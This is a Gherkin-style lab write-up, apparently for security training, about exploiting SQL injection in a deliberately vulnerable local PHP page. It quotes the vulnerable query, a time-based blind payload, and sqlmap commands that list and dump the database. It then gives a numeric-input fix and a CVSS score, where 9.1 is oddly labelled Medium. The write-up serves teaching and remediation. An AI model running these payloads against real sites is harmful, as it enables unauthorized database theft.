## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnerable Web Application
  Category:
    SQL Injection
  Location:
    http://localhost/www/SQL/sql6.php - number (field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used
    in an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Create an SQL injection to get database information
  Recommendation:
    Use prepared SQL statements and sanitize inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>    |
    | Ubuntu          | 18.04 LTS    |
    | Firefox         | 70.0.1       |
    | SQLmap          | 1.2.4        |
  TOE information:
    Given The site
    And A search bar
    And The server is running MySQL version 14.14
    And PHP version 7.2
    And is running on Ubuntu 18.04 with kernel 5.0.0-37-generic

  Scenario: Normal use case
    Given A search bar
    When I enter a book number
    Then I get a message
    """
    There is a book with this index.
    """

  Scenario: Static detection
    Given The source code from "sql6.php"
    When I search for the SQL query inside the code
    """
    $query = "SELECT bookname,authorname FROM books WHERE number = '$number'";
    """
    Then The number is concatenated inside the query
    And I have the same SQL injection vulnerability as in the other levels
    But I can't see easily the data
    """
    $result = mysqli_query($conn,$query);
    $row = @mysqli_num_rows($result);
    echo "<hr>";

    if($row > 0) {
      echo "<pre>There is a book with this index.</pre>";
    } else {
      echo "Not found!";
    }
    """

  Scenario: Dynamic detection
    Given The search bar
    When I put a single query inside the search bar
    Then The page returns the else message
    When I try put a single query inside the URL
    """
    ?number=1' AND SLEEP(5) AND 'hello'='hello&submit=Submit
    """
    Then I see the page sleeps 5 seconds
    And I can try an boolean based blind SQL Injection


  Scenario: Exploitation
    Given The vulnerability
    When I try to use the sqlmap command
    """
    sqlmap -u 'localhost/SQL/sql6.php?number=1&submit=Submit' --tables
    """
    Then I get a message from information of the database
    """"
    Database: 1ccb8097d0e9ce9f154608be60224c7c
    [4 tables]
    +----------+----------+-----------+------+
    | books                                  |
    | flags                                  |
    | secret                                 |
    | users                                  |
    +----------+----------+-----------+------+

    """
    When I put another command of SQLi
    """
    sqlmap -u 'localhost/SQL/sql6.php?number=1&submit=Submit' --dump
    """
    Then I get a dump from the database
    And I can enumerate the database

  Scenario: Remediation
    Given The source code
    When I validate if is numeric the value of the variable
    Then I add the next code in source
    """
    if(!is_numeric($number)) {
      echo "Please only numeric values";
      exit(0);
    }
    """
    When If I re-run my exploit whit the same query
    """
    ?number=1' AND SLEEP(5) AND 'hello'='hello&submit=Submit
    """
    Then I get:
    """
    Please only numeric values
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      8.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.2/10 (High) - E:H/RL:O/RC:C/CR:H/IR:X/AR:X
    Environmental: Unique and relevant attributes to a specific user environment
      9.1/10 (Medium) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L/MA:L


  Scenario: Correlations
    No correlations have been found to this date 2019-12-16
